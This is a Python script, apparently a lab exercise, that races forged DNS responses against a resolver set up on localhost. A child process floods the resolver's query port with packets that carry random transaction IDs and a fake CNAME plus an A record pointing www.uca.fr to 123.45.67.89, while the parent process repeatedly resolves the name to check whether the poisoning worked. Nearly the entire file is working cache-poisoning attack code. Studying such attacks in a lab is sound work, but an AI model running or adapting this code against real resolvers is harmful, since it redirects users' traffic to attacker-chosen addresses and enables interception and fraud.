#!/usr/bin/env python3
"""Lab script: race forged DNS answers against a resolver under test.

A child process repeatedly sends hand-built DNS response packets to the
server's query port while the parent process resolves a name through the
same server and prints what the server answers.
"""
import multiprocessing
import random
import socket
import time

from dns import resolver

# The packet helpers and constants used below (encode_header, encode_name,
# encode_question_entry, encode_response_entry, TYPE_A, TYPE_CNAME, CLASS_IN)
# come from this star import; it is kept as-is because the full list of names
# the module exports is not visible from this file.
from dns_utils import *

# TTL, in seconds, written into both forged answer records.
_RECORD_TTL = 3600


class DNSServer:
    """Address of a DNS server: its IP, its listening port, and the port
    it sends its own outgoing queries from."""

    def __init__(self, ip: str, port: int, query_port: int):
        self._ip: str = ip
        self._port: int = port
        self._query_port: int = query_port

    @property
    def ip(self) -> str:
        """IP address of the server."""
        return self._ip

    @property
    def port(self) -> int:
        """Port that `Request.get` sends its lookups to."""
        return self._port

    @property
    def query_port(self) -> int:
        """Port that `Request.post` sends its packets to."""
        return self._query_port


class Request:
    """Pair of cooperating loops run against a single `DNSServer`."""

    def __init__(self, dns: DNSServer):
        self._dns: DNSServer = dns

    @staticmethod
    def _build_packet_body(name: bytes, spoofed_name: bytes,
                           address: bytes) -> bytes:
        """Return the DNS response for *name*, minus the 2-byte transaction id.

        The body is a header, one question for *name*, a CNAME record from
        *name* to *spoofed_name*, and an A record from *spoofed_name* to
        *address*.
        """
        encoded_name = encode_name(name)
        encoded_spoofed_name = encode_name(spoofed_name)
        # NOTE(review): positional flags presumably mean qr=response,
        # opcode=0, aa=False, tc=False, rd=True, ra=True, rcode=0,
        # qdcount=1, ancount=2, nscount=0, arcount=0 -- confirm against
        # dns_utils.encode_header.
        body = encode_header(
            True, 0, False, False, True, True, 0, 1, 2, 0, 0)
        body += encode_question_entry(encoded_name, TYPE_A, CLASS_IN)
        body += encode_response_entry(
            encoded_name, TYPE_CNAME, CLASS_IN, _RECORD_TTL,
            encoded_spoofed_name)
        body += encode_response_entry(
            encoded_spoofed_name, TYPE_A, CLASS_IN, _RECORD_TTL, address)
        return body

    def post(self, pipe, spoofed_name_server: str, address: bytes):
        """Send response packets to the server's query port, forever.

        Args:
            pipe: connection end from which the encoded name to answer for
                is received (the other end is written by `get`).
            spoofed_name_server: name used as the CNAME target.
            address: raw bytes used as the data of the A record.

        Blocks until a first name arrives on *pipe*, then sends the same
        packet body over UDP, each time prefixed with a fresh random 2-byte
        transaction id, until another name is waiting on *pipe*; the body is
        then rebuilt for that name. Never returns.
        """
        spoofed_name_server_encoded: bytes = spoofed_name_server.encode()
        target = (self._dns.ip, self._dns.query_port)
        # The context manager closes the socket if the loop is ever left
        # through an exception (the original never closed it).
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sok:
            name_server_encoded: bytes = pipe.recv()
            while True:
                packet_body = self._build_packet_body(
                    name_server_encoded, spoofed_name_server_encoded, address)
                # Keep sending until the other side announces a new name.
                while not pipe.poll():
                    transaction_id = random.randbytes(2)
                    sok.sendto(transaction_id + packet_body, target)
                name_server_encoded = pipe.recv()

    def get(self, pipe, name_server: str):
        """Resolve *name_server* through the server once per loop, forever.

        Args:
            pipe: connection end on which the encoded name is sent before
                every lookup (the other end is read by `post`).
            name_server: name to resolve.

        Each iteration sends the name on *pipe*, sleeps one second, performs
        the lookup and prints its outcome. Resolver exceptions other than
        the three handled below propagate to the caller.
        """
        resolve = resolver.Resolver()
        resolve.nameservers = [self._dns.ip]
        resolve.port = self._dns.port
        while True:
            pipe.send(name_server.encode())
            # Pause for one second between announcing the name and looking
            # it up.
            time.sleep(1)
            try:
                res = resolve.resolve(name_server)
            except resolver.NXDOMAIN:
                print("Not found")
            except resolver.LifetimeTimeout:
                print("empty / timeout")
            except resolver.NoAnswer:
                print("No answer")
            else:
                print("Found", res.response.answer)


def main() -> None:
    """Start the sender process and run the lookup loop in this process."""
    server = DNSServer("127.0.0.1", 7654, 6969)
    req = Request(server)

    new_address = bytes((123, 45, 67, 89))
    domain = "www.uca.fr"
    spoofed_sub_domain = "fake"
    spoofed_domain = spoofed_sub_domain + "." + domain

    parent, child = multiprocessing.Pipe()
    p = multiprocessing.Process(
        target=req.post, args=(child, spoofed_domain, new_address))
    p.start()
    try:
        # get() loops forever, so the original outer `while True:` around
        # this call could never start a second iteration and was dropped.
        req.get(parent, domain)
    finally:
        # post() never returns on its own; without this, an uncaught
        # exception from get() would leave the interpreter waiting at exit
        # on a child that is still sending packets.
        p.terminate()
        p.join()


# Required for multiprocessing: with the "spawn" start method the child
# re-imports this module, and unguarded top-level code would run again there.
if __name__ == "__main__":
    main()